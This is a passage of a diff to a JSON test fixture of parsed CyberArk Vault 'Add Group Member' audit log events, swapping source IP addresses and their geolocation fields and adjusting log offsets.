+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -57,7 +54,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMPGW_localhost.localdomain",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:22",
         "event.action": "add group member",
@@ -70,26 +67,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 616,
+        "log.offset": 615,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -105,7 +99,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMP_ADB_localhost.localdomain",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:35",
         "event.action": "add group member",
@@ -118,26 +112,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1234,
+        "log.offset": 1232,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -153,7 +144,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "Administrator",
         "cyberarkpas.audit.timestamp": "Mar 10 09:58:01",
         "event.action": "add group member",
@@ -166,26 +157,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1857,
+        "log.offset": 1854,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -201,7 +189,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMApp_VAGRANT",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:29",
         "event.action": "add group member",
@@ -214,26 +202,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2455,
+        "log.offset": 2451,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -249,7 +234,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMGw_VAGRANT",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:30",
         "event.action": "add group member",
@@ -262,26 +247,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3056,
+        "log.offset": 3051,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -297,7 +279,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.target_user": "Administrator",
         "cyberarkpas.audit.timestamp": "Mar 10 14:17:15",
         "event.action": "add group member",
@@ -310,25 +292,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3659,
+        "log.offset": 3653,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -344,7 +324,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.target_user": "PSMApp_ASR-WIN",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:16",
         "event.action": "add group member",
@@ -357,25 +337,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4257,
+        "log.offset": 4250,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -391,7 +369,7 @@
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.target_user": "PSMGw_ASR-WIN",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:16",
         "event.action": "add group member",
@@ -404,25 +382,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4858,
+        "log.offset": 4850,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -435,11 +411,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:38Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add Group Member",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:38",
         "event.action": "add group member",
@@ -452,26 +428,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 5461,
+        "log.offset": 5452,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -484,11 +457,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T16:59:38Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add Group Member",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 08:59:38</Timestamp>\n    <IsoTimestamp>2021-03-11T16:59:38Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_VAGRANT</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.target_user": "PSMPGW_VAGRANT",
         "cyberarkpas.audit.timestamp": "Mar 11 08:59:38",
         "event.action": "add group member",
@@ -501,26 +474,23 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6945,
+        "log.offset": 6934,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -533,11 +503,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:17Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add Group Member",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PVWAGWAccounts</SourceUser>\n    <TargetUser>PSMPGW_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAGWAccounts",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.target_user": "PSMPGW_SSH",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:17",
         "event.action": "add group member",
@@ -550,23 +520,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8433,
+        "log.offset": 8420,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -579,11 +552,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:17Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add Group Member",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:17</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:17Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMAppUsers</SourceUser>\n    <TargetUser>PSMPApp_SSH</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.target_user": "PSMPApp_SSH",
         "cyberarkpas.audit.timestamp": "Mar 14 05:57:17",
         "event.action": "add group member",
@@ -596,23 +569,26 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9913,
+        "log.offset": 9896,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "34.71.250.247"
+            "81.2.69.143"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "34.71.250.247",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "34.71.250.247",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -625,11 +601,11 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:21Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Add Group Member",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMP_ADB_AppUsers</SourceUser>\n    <TargetUser>PSMP_ADB_asr-cyberark-psm-ssh</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 05:57:21</Timestamp>\n    <IsoTimestamp>2021-03-14T12:57:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>265</MessageID>\n    <Desc>Add Group Member</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Add Group Member</Action>\n    <SourceUser>PSMP_ADB_AppUsers</SourceUser>\n    <TargetUser>PSMP_ADB_asr-cyberark-psm-ssh</TargetUser>\n    <Safe></Safe>\n    <File></File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Add Group Member</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
